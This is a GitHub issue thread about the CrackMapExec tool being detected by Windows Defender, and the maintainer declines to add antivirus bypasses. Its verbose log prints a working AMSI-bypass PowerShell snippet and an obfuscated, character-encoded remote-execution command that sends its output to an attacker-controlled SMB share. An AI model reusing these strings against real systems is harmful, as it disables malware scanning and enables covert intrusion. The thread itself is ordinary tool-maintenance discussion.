### ISSUE TITLE
Powershell command execution flagged by Windows Defender

### ISSUE THREAD

**Issue by chr0n1k** [byt3bl33d3r/CrackMapExec#337]
## Steps to reproduce

1. ...install bleeding edge of CME
2. ...run attack commands against target

## Command string used
**cme --verbose smb 192.168.1.252 -u administrator -p XXXXXX -X 'whoami'**

## CME verbose output (using the --verbose flag)
DEBUG Calling ps_execute()
DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
whoami

DEBUG Starting SMB server
DEBUG Config file parsed
DEBUG Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
DEBUG Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
DEBUG Config file parsed
DEBUG Config file parsed
DEBUG Config file parsed
DEBUG Target system is 192.168.1.252 and isFDQN is False
DEBUG StringBinding: \\\\WINTERFELL[\\PIPE\\atsvc]
DEBUG StringBinding: \\\\WINTERFELL[\\pipe\\SessEnvPublicRpc]
DEBUG StringBinding: WINTERFELL[49667]
DEBUG StringBinding: 192.168.1.252[49667]
DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.1.252[49667]
DEBUG Executed command via wmiexec
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "& ( $pShOMe[21]+$PSHOME[34]+'x')( ( (91, 78, 101, 116,46,83 , 101, 114,118,105, 99, 101 , 80 ,111,105 ,110, 116, 77 , 97 , 110 ,97, 103, 101 , 114,93,58, 58 ,83,101 ,114 , 118,101 , 114 , 67 , 101 , 114 ,116,105, 102 ,105,99 , 97, 116 ,101 , 86 , 97, 108, 105, 100,97, 116 , 105,111, 110, 67 , 97 , 108,108,98, 97,99 , 107 ,32, 61,32 , 123,36 ,116 ,114 , 117,101 , 125, 10, 116,114, 121, 123,10 , 91 , 82, 101,102,93 , 46 , 65, 115 , 115,101 , 109, 98 , 108,121 , 46 ,71 , 101 ,116 , 84 , 121 ,112, 101 , 40, 39 , 83 ,121,115,39, 43, 39 ,116, 101,109 , 46, 77 , 97,110,39 , 43 , 39 , 97 ,103, 101 ,109 , 101 ,110, 116, 46 , 65,117 , 116 ,39,43 ,39,111 ,109, 97 , 116,105, 111 , 110, 46,65,109 , 39, 43, 39 , 115 ,105 ,85 , 116 ,39, 43 ,39 , 105 ,108 ,115, 39, 41,46 ,71,101, 116, 70, 105 ,101, 108 ,100 ,40 ,39 , 97, 109, 39 ,43, 39,115 , 105 ,73, 110, 105 , 39 ,43 , 39,116,70,97,105,108 , 101 ,100 ,39 , 44 ,32 ,39, 78,111 , 110 ,80 , 39 , 43,39 ,117 , 98 , 108,105,99,44 , 83 , 116,97,39,43 ,39 ,116,105 ,99 ,39 ,41, 46 , 83, 101 , 116 ,86 ,97 ,108, 117 , 101, 40,36,110,117, 108, 108,44 ,32 , 36 , 116 ,114,117, 101 ,41, 10 , 125 ,99 , 97, 116 , 99,104 ,123 ,125 ,10 ,119, 104, 111 ,97 ,109,105 )|% {([Char] [INT] $_)} )-JOin '')" 1> \\192.168.1.153\NAKPU\hoMFDi 2>&1
DEBUG Incoming connection (192.168.1.252,49984)
DEBUG AUTHENTICATE_MESSAGE (\,WINTERFELL)
DEBUG User \WINTERFELL authenticated successfully
DEBUG :::00::4141414141414141
SMB         192.168.1.252   445    WINTERFELL       [+] Executed command 

## CME Version (cme --version)
**4.0.1dev - Bug Pr0n**

## OS
**kali-rolling 2020.1**

## Target OS
**Windows 10 18362 x64**

## Detailed issue explanation
When the command is ran against the target with Windows Defender up to date the powershell execution gets picked up by AV. Sceenshot below:
![image](https://user-images.githubusercontent.com/30057970/74676553-4cf9c300-51c7-11ea-87bd-1273df7695a1.png)

**Comment by byt3bl33d3r** [comment]
I'm not playing the cat and mouse game with AV as I barely have enough time to maintain this as it stands. Feel free to submit a PR with a necessary bypass if you want.
Closing.
